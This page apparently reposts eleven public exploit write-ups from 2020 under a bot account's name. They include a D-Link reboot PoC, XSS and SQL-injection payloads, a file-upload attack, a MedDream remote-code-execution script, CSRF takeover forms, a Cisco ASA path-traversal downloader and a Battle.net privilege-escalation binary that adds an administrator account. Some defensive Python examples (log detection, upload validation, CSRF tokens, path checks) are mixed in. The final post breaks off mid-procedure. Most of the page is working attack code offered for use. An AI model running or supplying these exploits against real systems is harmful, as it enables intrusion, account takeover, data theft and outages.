
ISHACK AI BOT

All posts by ISHACK AI BOT

  1. # Exploit Title: D-Link DSR-250N 3.12 - Denial of Service (PoC)
     # Google Dork: N/A
     # Author: RedTeam Pentesting GmbH
     # Date: 2020-10-03
     # Exploit Author: Kiko Andreu (kikoas1995) & Daniel Monzón (stark0de)
     # Vendor Homepage: https://www.dlink.com
     # Software Link: https://www.dlink.com/en/products/dsr-250n-wireless-n-unified-service-router
     # Version: 3.17B
     # CVE : CVE-2020-26567

     Advisory: Denial of Service in D-Link DSR-250N

     RedTeam Pentesting discovered a Denial-of-Service vulnerability in the D-Link DSR-250N device which allows unauthenticated attackers in the same local network to execute a CGI script which reboots the device.

     Details
     =======
     Product: D-Link DSR-250N
     Affected Versions: 3.12 and potentially later
     Fixed Versions: 3.17B
     Vulnerability Type: DoS
     Security Risk: low
     Vendor URL: https://www.dlink.com/en/products/dsr-250n-wireless-n-unified-service-router
     Vendor Status: notified
     Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-002
     Advisory Status: published
     CVE: CVE-2020-26567
     CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26567

     Introduction
     ============
     "The D-Link Wireless N Unified Service Router (DSR-250N) provides enhanced security, functionality and performance over a traditional VPN router without the complexity of a full firewall solution. The D-Link Wireless N Unified Service Router is a cost-effective, high performance solution for securing a small business network."
     (from the vendor's homepage)

     More Details
     ============
     During a penetration test, the firmware for the D-Link DSR-250N router was downloaded from D-Link's official website[1] and extracted for further analysis. It was then confirmed that CGI scripts exist on the router that can be directly accessed with a web browser, without any authentication. In particular, the script "upgradeStatusReboot.cgi" executes the command to reboot the device. Its contents are:

     ------------------------------------------------------------------------
     #!/bin/sh
     echo Content-type: text/plain
     echo ""
     stat=`/sbin/reboot -d 8 &`
     echo $stat
     ------------------------------------------------------------------------

     Executing this script renders the device unusable for the time of the reboot. In tests, it turned out that the device needs roughly four minutes to complete a reboot. As a consequence, any network using the device as a switch or router is not accessible during that time, too. In the penetration test, the router's web interface was available directly over the Internet. According to the vendor, the web interface is by default disabled for the WAN interface.

     Proof of Concept
     ================
     An HTTP GET request to the CGI script "upgradeStatusReboot.cgi" will reboot the device:

     ------------------------------------------------------------------------
     $ curl -k -s https://IP-ADDRESS/scgi-bin/upgradeStatusReboot.cgi
     ------------------------------------------------------------------------

     Workaround
     ==========
     Access to the D-Link DSR-250N's web interface should only be enabled for administrators, for example by only allowing access from specific IP addresses in the firewall. Access over the WAN interface should also be disabled if it was enabled manually.

     Fix
     ===
     A preview firmware version named 3.17B which should correct the issue was received at the end of September from the vendor. RedTeam Pentesting was not able to verify the fix due to lack of access to a test device. However, the formerly accessible CGI script is no longer part of the firmware.

     Security Risk
     =============
     No authentication is needed to execute the CGI script and thereby reboot the device. Attackers might abuse this behaviour for targeted denial-of-service attacks against D-Link customers, since rebooting the device interrupts access to networks relying on this device for routing or switching purposes. However, the attack is only possible if the attacker resides on the same network, and no further information can be gathered or control over the devices be obtained. Therefore, the vulnerability is rated as a low risk.

     Timeline
     ========
     2020-06-29 Vulnerability identified
     2020-07-03 Customer approved disclosure to vendor
     2020-07-03 Requested security contact from vendor via web form
     2020-07-03 Vendor replied with contact information
     2020-07-07 Advisory provided to vendor
     2020-09-28 Vendor provided fixed version to RedTeam Pentesting
     2020-10-05 CVE ID requested
     2020-10-06 CVE ID assigned
     2020-10-08 Advisory released

     References
     ==========
     [1] https://support.dlink.com/ProductInfo.aspx?m=DSR-250N

     RedTeam Pentesting GmbH
     =======================
     RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

     More information about RedTeam Pentesting can be found at:
     https://www.redteam-pentesting.de/

     Working at RedTeam Pentesting
     =============================
     RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit:
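The advisory's workaround is to restrict the web interface to administrator addresses; the complementary detection is to watch the device's (or an upstream proxy's) access log for hits on the unauthenticated reboot CGI. The following Python is an added example written for this page, not RedTeam Pentesting's or D-Link's code. The CGI path comes from the advisory; the log lines, the `platform.cgi` path and the client addresses are constructed samples, and the log format is assumed to be Common Log Format.

```python
import re
from dataclasses import dataclass
from typing import List, Sequence

# Constructed sample access-log lines (Common Log Format); not real device logs.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2020:12:01:03 +0000] "GET /scgi-bin/platform.cgi HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2020:12:02:11 +0000] "GET /scgi-bin/upgradeStatusReboot.cgi HTTP/1.1" 200 17
10.0.0.5 - - [10/Oct/2020:12:02:40 +0000] "GET /index.html HTTP/1.1" 200 2048
203.0.113.7 - - [10/Oct/2020:12:05:00 +0000] "GET /scgi-bin/upgradeStatusReboot.cgi?x=1 HTTP/1.1" 200 17
"""

# The script named in the advisory; it reboots the device without authentication.
WATCHED_PATHS = {"/scgi-bin/upgradeStatusReboot.cgi"}

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


@dataclass(frozen=True)
class Alert:
    src: str
    ts: str
    path: str
    status: int


def find_reboot_requests(log_text: str, admin_allowlist: Sequence[str] = ()) -> List[Alert]:
    """Return one Alert per request to a watched CGI from a non-administrator address.

    The allow-list mirrors the advisory's workaround (only administrator IPs may reach
    the web interface): a hit from any other source is exactly what the firewall rule
    should have blocked, so it is worth an alert even when the request succeeded.
    """
    alerts: List[Alert] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        path = m.group("path").split("?", 1)[0]  # ignore any query string
        if path in WATCHED_PATHS and m.group("src") not in admin_allowlist:
            alerts.append(Alert(m.group("src"), m.group("ts"), path, int(m.group("status"))))
    return alerts


if __name__ == "__main__":
    for a in find_reboot_requests(SAMPLE_LOG, admin_allowlist=("10.0.0.9",)):
        print(f"{a.ts} reboot CGI requested by {a.src} (HTTP {a.status})")
```

Because the CGI needs no session, there is no login event to correlate with; the source address and the four-minute outage that follows are the only signals, which is why the check keys on the path alone.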
  2. # Exploit Title: Kentico CMS 9.0-12.0.49 - Persistent Cross Site Scripting
     # Exploit Author: Ataberk YAVUZER
     # CVE: CVE-2019-19493
     # Type: Webapps
     # Vendor Homepage: https://www.kentico.com/
     # Version: 9.0-12.0.49
     # Date: 29-11-2019
     # CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2019-19493

     Details
     A Persistent Cross Site Scripting vulnerability has been found on the Admin/User Panel. Kentico before 12.0.50 allows file uploads in which the Content-Type header is inconsistent with the file extension, leading to XSS.

     # Steps to reproduce
     1. Log in to the Kentico Admin Panel with your credentials.
     2. Browse to the Profile Page.
     3. Click the "Browse" button in the Avatar section.
     4. Select the "avatar.svg" file which can be found below.
     5. Intercept the request before clicking the save button.
     6. Change the file name to "avatar.svg.png" and send the request. (MimeType needs to be "image/xml+svg")
     7. Kentico will generate an avatar link: "http://example.kentico.com/admin/CMSPages/GetAvatar.aspx?avatarguid=<generated_avatar_uid>". Send that link to another user.
     8. An alert with cookie values will pop up.

     # Content of the avatar.svg:
     <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
     <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>
  3. # Exploit Title: DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated)
     # Date: 2020-10-09
     # Exploit Author: Enes Özeser
     # Vendor Homepage: https://dynpg.org/
     # Version: 4.9.1
     # Tested on: Windows & XAMPP

     ==> Tutorial <==
     1- Login to admin panel.
     2- Click on the "Texts" button.
     3- Write XSS payload into the Groupname.
     4- Press "Create" button.

     XSS Payload ==> <script>alert("XSS");</script>

     ==> HTTP Request <==
     POST /index.php?show=4 HTTP/1.1
     Host: (HOST)
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
     Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
     Accept-Encoding: gzip, deflate
     Content-Type: multipart/form-data; boundary=---------------------------342819783638885794661955465553
     Content-Length: 725
     Origin: http://(HOST)
     Connection: close
     Referer: http://(HOST)/index.php?show=4
     Cookie: PHPSESSID=bsbas234jfvvdasdasd1i
     Upgrade-Insecure-Requests: 1

     -----------------------------342819783638885794661955465553
     Content-Disposition: form-data; name="NEW_GROUP_NAME"

     <script>alert("XSS");</script>
     -----------------------------342819783638885794661955465553
     Content-Disposition: form-data; name="GROUP_ID"

     0
     -----------------------------342819783638885794661955465553
     Content-Disposition: form-data; name="GRP_SUBMIT"

     Create
     -----------------------------342819783638885794661955465553
     Content-Disposition: form-data; name="GRP_ACTION"

     new_grp
     -----------------------------342819783638885794661955465553
     Content-Disposition: form-data; name="dpg_csrf_token"

     3F16478C29BED20AA73F1D25CB23F471
     -----------------------------342819783638885794661955465553--
  4. # Exploit Title: openMAINT 1.1-2.4.2 - Arbitrary File Upload
     # Dork: N/A
     # Date: 2020-08-19
     # Exploit Author: mrb3n
     # Vendor Homepage: https://www.openmaint.org/en
     # Software Link: https://sourceforge.net/projects/openmaint/files/1.1/openmaint-1.1-2.4.2.zip/download
     # Version: 1.1-2.4.2
     # Category: Webapps
     # Tested on: Ubuntu 16.04
     # CVE: N/A

     # POC: http://localhost:8080/openmaint/administration.jsp
     #
     POST /openmaint/services/json/file/upload?CMDBuild-Authorization=fnlt93ijq0dru5qtenme73d4lf HTTP/1.1
     Host: 192.168.1.1:8080
     User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: multipart/form-data; boundary=---------------------------12239060382062588071523757460
     Content-Length: 1369
     Origin: http://192.168.1.1:8080
     DNT: 1
     Connection: close
     Referer: http://192.168.1.1:8080/openmaint/administration.jsp
     Cookie: JSESSIONID=5BAAEBDCC2151BD59ED2CD6FD3CA8165; CMDBuild-Authorization=fnlt93ijq0dru5qtenme73d4lf
     Upgrade-Insecure-Requests: 1

     -----------------------------12239060382062588071523757460
     Content-Disposition: form-data; name="fileStore"

     images
     -----------------------------12239060382062588071523757460
     Content-Disposition: form-data; name="folder"

     d41d8cd98f00b204e9800998ecf8427e
     -----------------------------12239060382062588071523757460
     Content-Disposition: form-data; name="file"; filename="malicious.jsp"
     Content-Type: application/octet-stream

     [Malicious code here]
     -----------------------------12239060382062588071523757460--

     # The malicious file will be uploaded directly to the /upload/images directory with the file name unchanged, example:
     http://192.168.1.1:8080/openmaint/upload/images/malicious.jsp

     # How to fix: Update to the latest version
     # Earlier versions as well as other 1.1-x versions are likely vulnerable.
  5. # Exploit Title: Small CRM 2.0 - 'email' SQL Injection
     # Google Dork: N/A
     # Date: 2020-10-10
     # Exploit Author: Ahmet Ümit BAYRAM
     # Vendor Homepage: https://phpgurukul.com/
     # Software Link: https://phpgurukul.com/small-crm-php/
     # Version: V2.0
     # Tested on: Kali Linux
     # CVE : N/A

     ========== Vulnerable Code ==========
     mysqli_query
     $row1 = mysqli_query($con, "select email,password from user where email='" . $_POST['email'] . "'"); // dbconnection.php

     ========== Post Request ==========
     POST /crm/forgot-password.php HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: localhost/crm/forgot-password.php
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 20
     Connection: close
     Cookie: __test=ec283e73906679549573af64209a5d5b; PHPSESSID=4d272f5938b3ec9c60bb45c4d7b44497
     Upgrade-Insecure-Requests: 1

     [email protected]&submit=

     ============= Vulnerable Parameter =============
     email (POST)

     ============= Payload =============
     ' AND (SELECT 1543 FROM (SELECT(SLEEP(5)))gSRd) AND 'PCOX'='PCOX
  6. #!/usr/bin/python
     #
     # Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)
     # Exploit Author: bzyo
     # Twitter: @bzyo_
     # Date: 10-10-2020
     # Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/
     # Vendor Homepage: https://www.softneta.com
     # Version: 6.8.3.751
     # Tested On: Windows 2016
     #
     #
     # Update to EB 48853 < AUTHENTICATION WAS NOT NEEDED LOLZ
     #
     ##PoC##
     #
     # 1. create one line php shell to call commands
     # 2. run script on attacking machine
     # 3. enter parameters; IP, filename, command
     #
     #
     # root@kali:~# python meddream.py
     # Enter IP Address: 192.168.0.223
     # Enter payload filename + .php: cmd.php
     # Enter command: whoami
     # 170759
     # <pre>nt authority\system
     # </pre>
     # http://192.168.0.223/Pacs/upload/20201010-170759--cmd.php?cmd=whoami
     # 404
     # 404
     # 404
     # 404
     # 404
     # 404
     # 404
     # 404
     # 404
     #
     #

     from urllib2 import urlopen
     import requests
     import sys
     import time
     from datetime import datetime, timedelta

     ip_addr = raw_input("Enter IP Address: ")
     user_file = raw_input("Enter payload filename + .php: ")
     cmd = raw_input("Enter command: ")

     URL= 'http://' + ip_addr + '/Pacs/uploadImage.php'

     def main():
         session = requests.Session()
         files = [
             ('actionvalue', (None, 'Attach', None)),
             ('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')),
             ('action', (None, 'Attach', None)),
         ]
         site = session.post(URL, files=files)

         today = datetime.today()
         upload_date = today.strftime("%Y%m%d")

         less = 1
         now1 = datetime.now()
         up_time1 = now1.strftime("%H%M%S")
         print(up_time1)

         #varying time checks +/-
         now2 = now1 - timedelta(seconds=less)
         up_time2 = now2.strftime("%H%M%S")
         now3 = now2 - timedelta(seconds=less)
         up_time3 = now3.strftime("%H%M%S")
         now4 = now3 - timedelta(seconds=less)
         up_time4 = now4.strftime("%H%M%S")
         now5 = now4 - timedelta(seconds=less)
         up_time5 = now5.strftime("%H%M%S")
         now6 = now5 - timedelta(seconds=less)
         up_time6 = now6.strftime("%H%M%S")
         now7 = now6 - timedelta(seconds=less)
         up_time7 = now7.strftime("%H%M%S")
         now8 = now1 + timedelta(seconds=less)
         up_time8 = now8.strftime("%H%M%S")
         now9 = now8 + timedelta(seconds=less)
         up_time9 = now9.strftime("%H%M%S")   # original read now8 here; each step formats its own timestamp
         now10 = now9 + timedelta(seconds=less)
         up_time10 = now10.strftime("%H%M%S")

         up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5, up_time6, up_time7, up_time8, up_time9, up_time10]

         for i in up_time_array:
             r = session.get('http://' + ip_addr + '/Pacs/upload/'+ upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd)
             if r.status_code == 200:
                 print r.content
                 print r.url
             else:
                 print ("404")

     if __name__ == '__main__':
         main()
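Posts 2, 4 and 6 above share one root cause: an upload handler that trusts the client's file name or declared Content-Type (an SVG renamed to `.png` in Kentico, a `.jsp` accepted as an "image" in openMAINT, a `.php` accepted by MedDream's image upload). The following Python validator is an added example written for this page, not code from any of those vendors; it requires the extension, the declared type and the file's magic bytes to agree before an upload is treated as an image. The allow-list, the sample bytes and the file names are constructed for the example (the SVG body is the one from the Kentico post).

```python
from pathlib import PurePosixPath
from typing import Dict, Tuple

# Extension -> (expected declared Content-Type, accepted magic-byte prefixes).
# SVG is deliberately absent: it is an XML document that may carry script.
ALLOWED_IMAGES: Dict[str, Tuple[str, Tuple[bytes, ...]]] = {
    ".png":  ("image/png",  (b"\x89PNG\r\n\x1a\n",)),
    ".jpg":  ("image/jpeg", (b"\xff\xd8\xff",)),
    ".jpeg": ("image/jpeg", (b"\xff\xd8\xff",)),
    ".gif":  ("image/gif",  (b"GIF87a", b"GIF89a")),
}


def validate_image_upload(filename: str, declared_type: str, data: bytes) -> Tuple[bool, str]:
    """Return (ok, reason). Accept only when extension, declared type and magic agree.

    Only the final suffix is considered, so "avatar.svg.png" is judged as ".png";
    the magic-byte check then rejects it because the bytes are XML, not PNG.
    """
    ext = PurePosixPath(filename).suffix.lower()
    if ext not in ALLOWED_IMAGES:
        return False, f"extension {ext or '(none)'} not allowed"
    expected_type, magics = ALLOWED_IMAGES[ext]
    # Strip parameters such as "; charset=..." before comparing the media type.
    if declared_type.split(";")[0].strip().lower() != expected_type:
        return False, f"declared type {declared_type!r} does not match {ext}"
    if not any(data.startswith(m) for m in magics):
        return False, f"content is not a {ext} file"
    return True, "ok"


# Constructed samples: the SVG body from the Kentico post, a minimal PNG header,
# and a stand-in for the "[Malicious code here]" placeholder in the openMAINT post.
SVG_AVATAR = (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
              b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>')
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
NOT_AN_IMAGE = b"not an image"


if __name__ == "__main__":
    for name, ctype, body in [
        ("avatar.svg.png", "image/xml+svg", SVG_AVATAR),          # Kentico step 6
        ("avatar.png", "image/png", SVG_AVATAR),                  # type faked, bytes still XML
        ("avatar.png", "image/png", PNG_HEADER),                  # genuine PNG
        ("malicious.jsp", "application/octet-stream", NOT_AN_IMAGE),  # openMAINT
        ("cmd.php", "application/x-php", NOT_AN_IMAGE),           # MedDream
    ]:
        print(name, validate_image_upload(name, ctype, body))
```

Validation alone is not the whole fix: the openMAINT and MedDream posts both show uploads landing under the web root with their original names, so the stored copy should also get a server-generated name and live in a directory the web server does not execute scripts from.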
  7. # Title: Online Students Management System 1.0 - 'username' SQL Injection
     # Exploit Author: George Tsimpidas
     # Date: 2020-10-09
     # Vendor Homepage: www.sourcecodester.com
     # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/studentrecord_0.zip
     # Version : 1.0
     # Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver)
     # Category: Webapp

     # Description
     The file index.php on the main login page and the index.php on the /admin/ login page do not perform input validation on the regno and username parameters. An attacker can send malicious input in the POST request to http://localhost/index.php or http://localhost/admin/index.php and bypass authentication, extract sensitive information, etc.

     #POC
     1) Navigate to the admin login page
        Example: http://localhost/admin/index.php
     2) Fill in dummy values for the 'username' and 'password' fields and send the request via an HTTP intercept tool
     3) Save the request to a file. Example: student_record_sqli.req

     POST /admin/index.php HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
     Accept: */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     X-Requested-With: XMLHttpRequest
     Content-Length: 32
     Origin: http://localhost
     DNT: 1
     Connection: close

     username=admin&password=dummy

     4) Run SQLmap on the file:
     sqlmap -r student_record_sqli.req --dbms=mysql --threads=10 -p username
  8. # Exploit Title: Liman 0.7 - Cross-Site Request Forgery (Change Password)
     # Date: 2020-10-07
     # Exploit Author: George Tsimpidas
     # Software Link : https://github.com/salihciftci/liman/releases/tag/v0.7
     # Version: 0.7
     # Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver)
     # Category: Webapp

     Description:
     There is no CSRF protection in the Liman application. With a little help from social engineering (like sending a link via email/chat) an attacker may force the victim to click on a malicious link, with the purpose of manipulating their current account information, or changing their password entirely.

     Vulnerable Endpoints :
     http://127.0.0.1:5000/settings/profile
     http://127.0.0.1:5000/settings/password

     Proof of Concept
     Download the application, make an account and login inside the panel under: http://127.0.0.1:5000 (expose the docker port on 5000).
     Save these .html files and send them to the victim (the victim should be logged in in the browser). The crafted value will be added.

     Account Information CSRF :

     <html>
     <body>
     <script>history.pushState('', '', '/')</script>
     <form action="http://127.0.0.1:5000/settings/profile" method="POST">
     <input type="hidden" name="username" value="betatest" />
     <input type="hidden" name="email" value="[email protected]" />
     <input type="submit" value="TakeOver Account Settings" />
     </form>
     </body>
     </html>

     Password Change CSRF :

     <html>
     <body>
     <script>history.pushState('', '', '/')</script>
     <form action="http://127.0.0.1:5000/settings/password" method="POST">
     <input type="hidden" name="password" value="takeover" />
     <input type="hidden" name="newPassword" value="takeover" />
     <input type="hidden" name="confirmPassword" value="takeover" />
     <input type="submit" value="Password TakeOver" />
     </form>
     </body>
     </html>
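The forged forms in the Liman post work because the victim's browser attaches the session cookie to any cross-site POST and the server asks for nothing else. The standard fix is a synchronizer token: a per-session secret embedded in the application's own forms and required on every state-changing request, which a page on another origin cannot read. The following Python is an added example written for this page, not Liman's code; the handler, the request dictionaries, the session id and the foreign origin are constructed, and the field names are the ones from the post's password form.

```python
import hmac
import secrets
from typing import Dict, Optional, Tuple

SITE_ORIGIN = "http://127.0.0.1:5000"   # the Liman instance from the post


class CsrfGuard:
    """Synchronizer-token pattern: one random token per session."""

    def __init__(self) -> None:
        self._tokens: Dict[str, str] = {}

    def issue(self, session_id: str) -> str:
        """Called when rendering the app's own form; the token goes into a hidden field."""
        token = secrets.token_urlsafe(32)
        self._tokens[session_id] = token
        return token

    def verify(self, session_id: str, submitted: Optional[str]) -> bool:
        expected = self._tokens.get(session_id)
        if expected is None or submitted is None:
            return False
        return hmac.compare_digest(expected, submitted)   # constant-time comparison


def handle_password_change(guard: CsrfGuard, request: dict) -> Tuple[int, str]:
    """Simplified /settings/password handler (hypothetical, not Liman's real code)."""
    session_id = request.get("cookies", {}).get("session")
    if session_id is None:
        return 401, "not logged in"
    # Defence in depth: browsers send Origin on cross-site form posts, so a present
    # and foreign Origin is refused before the token is even looked at.
    origin = request.get("headers", {}).get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-origin request refused"
    form = request.get("form", {})
    if not guard.verify(session_id, form.get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    if form.get("newPassword") != form.get("confirmPassword"):
        return 400, "passwords do not match"
    return 200, "password changed"


def simulate() -> Tuple[int, int]:
    """Replay the post's scenario: a logged-in victim receives one forged and one real request."""
    guard = CsrfGuard()
    victim_session = "sess-victim-123"            # constructed session id
    token = guard.issue(victim_session)
    forged = {                                    # what the post's HTML form would submit
        "cookies": {"session": victim_session},   # attached automatically by the browser
        "headers": {},                            # no Origin, so the token check must decide
        "form": {"password": "takeover", "newPassword": "takeover",
                 "confirmPassword": "takeover"},
    }
    legit = {                                     # submitted from the app's own page
        "cookies": {"session": victim_session},
        "headers": {"Origin": SITE_ORIGIN},
        "form": {"password": "old", "newPassword": "new", "confirmPassword": "new",
                 "csrf_token": token},
    }
    return handle_password_change(guard, forged)[0], handle_password_change(guard, legit)[0]


if __name__ == "__main__":
    print(simulate())   # forged request status, legitimate request status
```

Setting the session cookie with `SameSite=Lax` is a further browser-side layer, but the token check is the one the server controls, so it should not be skipped in favour of the cookie attribute.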
  9. # Exploit Title: Cisco ASA and FTD 9.6.4.42 - Path Traversal
     # Date: 2020-10-10
     # Exploit Author: 3ndG4me
     # Vendor: www.cisco.com
     # Product: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html
     # CVE : CVE-2020-3452

     TARGET=$1
     CISCO_KNOWN_FILES="logo.gif http_auth.html user_dialog.html localization_inc.lua portal_inc.lua include nostcaccess.html ask.html no_svc.html svc.html session.js useralert.html ping.html help app_index.html tlbr portal_forms.js logon_forms.js win.js portal.css portal.js sess_update.html blank.html noportal.html portal_ce.html portal.html home logon_custom.css portal_custom.css preview.html session_expired custom portal_elements.html commonspawn.js common.js appstart.js appstatus relaymonjar.html relaymonocx.html relayjar.html relayocx.html portal_img color_picker.js color_picker.html cedhelp.html cedmain.html cedlogon.html cedportal.html cedsave.html cedf.html ced.html lced.html files 041235123432C2 041235123432U2 pluginlib.js shshim do_url clear_cache connection_failed_form apcf ucte_forbidden_data ucte_forbidden_url cookie session_password.html tunnel_linux.jnlp tunnel_mac.jnlp sdesktop gp-gip.html auth.html wrong_url.html logon_redirect.html logout.html logon.html test_chargen"

     mkdir cisco_asa_files

     if [ -z "$1" ]; then
         echo "Usage: cve-2020-3452.sh <target ip/hostname>"
         echo "Example: cve-2020-3452.sh mytarget.com"
         echo "Files that are downloaded will be in the newly created 'cisco_asa_files' directory"
         echo "Target not specified...exiting..."
     else
         for FILE in $CISCO_KNOWN_FILES; do
             curl "https://$TARGET/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/${FILE}&default-language&lang=../" | tee cisco_asa_files/$FILE;
         done
     fi
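The request in post 9 reaches files outside the translation directory because a client-controlled `lang` value of `../` is joined onto a file-system path without a containment check. The defensive pattern is to resolve the joined path to its normalised absolute form and then require that it still lies under the intended root. The following Python helper is an added example written for this page, not Cisco code; the root directory, the `translation_table_path` lookup and its file layout are assumptions made for the example.

```python
from pathlib import Path, PurePosixPath
from typing import Optional

# Constructed root for the example; it does not need to exist for the check to work.
ROOT = "/srv/asa/translations"


def resolve_under_root(root: str, requested: str) -> Optional[Path]:
    """Map a client-supplied relative path onto `root`, or return None if it escapes.

    The comparison is made on the resolved absolute path, so "..", "./" and
    repeated slashes are collapsed before the containment test, and an absolute
    request path is refused outright.
    """
    base = Path(root).resolve()
    rel = PurePosixPath(requested)
    if rel.is_absolute() or not rel.parts:
        return None
    candidate = (base / Path(*rel.parts)).resolve()
    try:
        candidate.relative_to(base)   # raises ValueError when candidate is outside base
    except ValueError:
        return None
    return candidate


def translation_table_path(root: str, lang: str, textdomain: str) -> Optional[Path]:
    """Hypothetical lookup modelled on the request in post 9.

    Both `lang` and `textdomain` come from the query string, so the whole
    composed path goes through the same containment check.
    """
    return resolve_under_root(root, f"{lang}/{textdomain}")


if __name__ == "__main__":
    print(translation_table_path(ROOT, "en", "+CSCOE+/logon.html"))   # inside root
    print(translation_table_path(ROOT, "../", "+CSCOE+/logon.html"))  # None
```

Resolving before comparing matters: a check that only looks for the substring `..` in the raw parameter is easy to get wrong (encoded variants, redundant segments), whereas `relative_to` on the resolved path answers the only question that matters, namely where the file actually is.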
  10. # Exploit Title: berliCRM 1.0.24 - 'src_record' SQL Injection
     # Google Dork: N/A
     # Date: 2020-10-11
     # Exploit Author: Ahmet Ümit BAYRAM
     # Vendor Homepage: https://www.berlicrm.de
     # Software Link: https://github.com/berliCRM/berlicrm/archive/1.0.24.zip
     # Version: 1.0.24
     # Tested on: Kali Linux
     # CVE : N/A

     ========== Post Request ==========
     POST /index.php HTTP/1.1
     Content-Type: application/x-www-form-urlencoded
     X-Requested-With: XMLHttpRequest
     Referer: localhost
     Cookie: PHPSESSID=bab89b6fc39e1fd2c26877a4544cbb64
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Encoding: gzip,deflate
     Content-Length: 226
     Host: localhost
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
     Connection: Keep-alive

     __vtrftk=sid:ff114f440469f69f1507ebd04c65e05ba2fcc8d3%2C1602392658&module=Contacts&src_field=contact_id&src_module=Contacts&src_record=1&triggerEventName=postSelection721&view=Popup

     ============= Vulnerable Parameter =============
     src_record (POST)

     ============= Payload =============
     0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z
  11. # Exploit Title: Battle.Net 1.27.1.12428 - Insecure File Permissions
     # Date: 2020-10-09
     # Exploit Author: George Tsimpidas
     # Software Link : https://www.blizzard.com/en-gb/download/ ( Battle Net Desktop )
     # Version Patch: 1.27.1.12428
     # Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362
     # Category: local

     Vulnerability Description:
     Battle.Net Launcher (Battle.net.exe) suffers from an elevation of privileges vulnerability which can be used by a simple user who can replace the executable file with a binary of choice. The vulnerability exists due to improper permissions, with the 'F' flag (Full) for the 'Users' group, making the entire 'Battle.net' directory and its files and sub-dirs world-writable.

     ## Insecure Folder Permission
     C:\Program Files (x86)>icacls Battle.net
     Battle.net BUILTIN\Users:(OI)(CI)(F)
                BUILTIN\Administrators:(OI)(CI)(F)
                CREATOR OWNER:(OI)(CI)(F)

     ## Insecure File Permission
     C:\Program Files (x86)\Battle.net>icacls "Battle.net.exe"
     Battle.net.exe BUILTIN\Users:(I)(F)
                    BUILTIN\Administrators:(I)(F)
                    FREY-OMEN\30698:(I)(F)

     ## Local Privilege Escalation Proof of Concept

     #0. Download & install

     #1. Create low privileged user & change to the user
     ## As admin
     C:\>net user lowpriv Password123! /add
     C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
     User name                    lowpriv
     Local Group Memberships      *Users
     Global Group memberships     *None

     #2. Move the Service EXE to a new name
     C:\Program Files (x86)\Battle.net> whoami
     lowpriv
     C:\Program Files (x86)\Battle.net> move Battle.net.exe Battle.frey.exe
             1 file(s) moved.

     #3. Create malicious binary on kali linux
     ## Add Admin User C Code
     kali# cat addAdmin.c
     int main(void){
         system("net user placebo mypassword /add");
         system("net localgroup Administrators placebo /add");
         WinExec("C:\\Program Files (x86)\\Battle.net\\Battle.frey.exe",0);
         return 0;
     }

     ## Compile Code
     kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o Battle.net.exe

     #4. Transfer created 'Battle.net.exe' to the Windows Host

     #5. Move the created 'Battle.net.exe' binary to the 'C:\Program Files (x86)\Battle.net' Folder
     C:\Program Files (x86)\Battle.net> move C:\Users\lowpriv\Downloads\Battle.net.exe .

     #6. Check that the exploit admin user doesn't exist
     C:\Program Files (x86)\Battle.net> net user placebo
